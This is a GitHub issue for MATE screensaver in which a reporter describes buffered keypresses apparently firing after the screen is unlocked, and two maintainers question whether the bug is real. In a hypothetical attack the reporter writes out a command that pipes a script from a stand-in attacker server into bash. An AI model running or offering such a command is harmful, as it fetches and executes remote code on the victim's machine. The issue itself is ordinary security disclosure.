Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

hammering the keyboard may leave keypresses in the buffer #247

Open
hannob opened this issue Feb 1, 2021 · 2 comments
Open

hammering the keyboard may leave keypresses in the buffer #247

hannob opened this issue Feb 1, 2021 · 2 comments

Comments

@hannob
Copy link

hannob commented Feb 1, 2021

I made an observation which I believe could be security relevant. By simulating hammering keypresses with xdotool I ended up in a situation where at some point the "Switch User" button will be hit, which will then cause a switch to the lock screen of the display manager.
When unlocking the display manager's lock screen keypresses which apparently somehow are still in some buffer will be triggered.

To better illustrate this behavior

mate1.mp4

I have attached a video.

I have not analyzed this in exact detail, but I believe this means it would somehow be possible for someone to enter a certain chain of keypresses while the screen is locked, which will lead to these keypresses causing events once the screen is unlocked. An attacker may use this by entering a chain of keypresses that will open a terminal and do something like "curl https://attackerserver.example.com/evilscript.sh|bash", which would then be executed once the screen is unlocked by the owner of the machine.

Expected behaviour

Keypresses entered while the screen is locked should not influence the desktop ui after unlocking.

Actual behaviour

Buffered keypresses are activated after unlocking.

Steps to reproduce the behaviour

Run something like this on a terminal:

sleep 5;for i in $(seq 1 5000); do xdotool key ${RANDOM:0:2}; done

Immediately switch to another terminal and call

mate-screensaver-command -l

MATE general version

1.24

Package version

1.24.1

Linux Distribution

Gentoo

Link to bugreport of your Distribution (requirement)

This is almost certainly completely unrelated to the distribution, so a distribution bug report makes little sense here.
@cwendling
Copy link
Member

I didn't take enough time to make the random generator hit switch user so I can't be sure but I'm not yet convinced by this report.

Couldn't it simply be that xdotool is still emitting events after unlocking the screen? I could easily imagine events not actually working as expected when the user's X session is not the active one anymore (when going back to the login manager), and "blocking" until the X session becomes "active" again.
From the video I cannot tell whether or not the script emitting events is still running or not, so there's no data saying it's not.

If really those events are generated after the screen is unlocked, it's just a test issue, not an actual bug somewhere.

@zhuyaliang
Copy link
Member

mate-screensaver doesn't buffer buttons

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@hannob @cwendling @zhuyaliang